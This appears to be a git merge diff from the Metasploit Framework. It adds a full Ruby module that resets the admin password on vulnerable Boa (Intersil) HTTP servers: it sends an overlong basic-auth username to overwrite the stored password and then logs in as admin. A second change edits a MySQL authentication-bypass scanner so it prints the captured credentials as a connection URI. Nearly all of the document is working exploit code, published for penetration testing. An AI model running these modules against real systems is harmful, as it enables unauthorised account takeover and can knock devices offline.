Merge branch 'master' into feature/vuln-info

modules/auxiliary/admin/http/intersil_pass_reset.rb

@@ -0,0 +1,114 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'          => 'Intersil (Boa) HTTPd Basic Authentication Password Reset',
+			'Description'   => %q{
+					The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+					allows basic authentication bypass when the user string is greater
+					than 127 bytes long.  The long string causes the password to be
+					overwritten in memory, which enables the attacker to reset the
+					password.  In addition, the malicious attempt also may cause a
+					denial-of-service condition.
+
+					Please note that you must set the request URI to the directory that
+					requires basic authentication in order to work properly.
+				},
+			'Author'        =>
+				[
+					'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+					'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+					'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+				],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html']
+				],
+			'DisclosureDate' => 'Sep 10 2007'))
+
+		register_options(
+			[
+				OptString.new('TARGETURI', [ true,  "The request URI", '/']),
+				OptString.new('PASSWORD', [true, 'The password to set', 'pass'])
+			], self.class)
+	end
+
+	def check
+		begin
+			res = send_request_cgi({
+				'uri'=>'/',
+				'method'=>'GET'
+			})
+
+			if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+				print_status("#{@peer} - Boa Version Detected: #{m[1]}")
+				return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+				return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+				return Exploit::CheckCode::Vulnerable
+			else
+				print_status("#{@peer} - Not a Boa Server!")
+				return Exploit::CheckCode::Safe # not a boa server
+			end
+
+		rescue Rex::ConnectionRefused
+			print_error("#{@peer} - Connection refused by server.")
+			return Exploit::CheckCode::Safe
+		end
+	end
+
+	def run
+		@peer = "#{rhost}:#{rport}"
+		return if check != Exploit::CheckCode::Vulnerable
+
+		uri = target_uri.path
+		uri << '/' if uri[-1,1] != '/'
+
+		res = send_request_cgi({
+			'uri'=> uri,
+			'method'=>'GET',
+			'basic_auth' => "#{Rex::Text.rand_text_alpha(127)}:#{datastore['PASSWORD']}"
+		})
+
+		if res.nil?
+			print_error("#{@peer} - The server may be down")
+			return
+		elsif res and res.code != 401
+			print_status("#{@peer} - #{uri} does not have basic authentication enabled")
+			return
+		end
+
+		print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten")
+		res = send_request_cgi({
+			'uri'   => uri,
+			'method'=> 'GET',
+			'basic_auth' => "admin:#{datastore['PASSWORD']}"
+		})
+
+		if not res
+			print_error("#{@peer} - Server timedout, will not continue")
+			return
+		end
+
+		case res.code
+		when 200
+			print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
+		when 401
+			print_error("#{@peer} - Access forbidden. The password reset attempt did not work")
+		else
+			print_status("#{@peer} - Unexpected response: Code #{res.code} encountered")
+		end
+
+	end
+end

modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb

@@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
 							:socket         => s,
 							:db             => nil
 							})
-						print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts"
+						print_status "#{rhost}:#{rport} Successfully bypassed authentication after #{count} attempts. URI: mysql://#{username}:#{password}@#{rhost}:#{rport}"
 						results << x
 					rescue RbMysql::AccessDeniedError
 					rescue Exception => e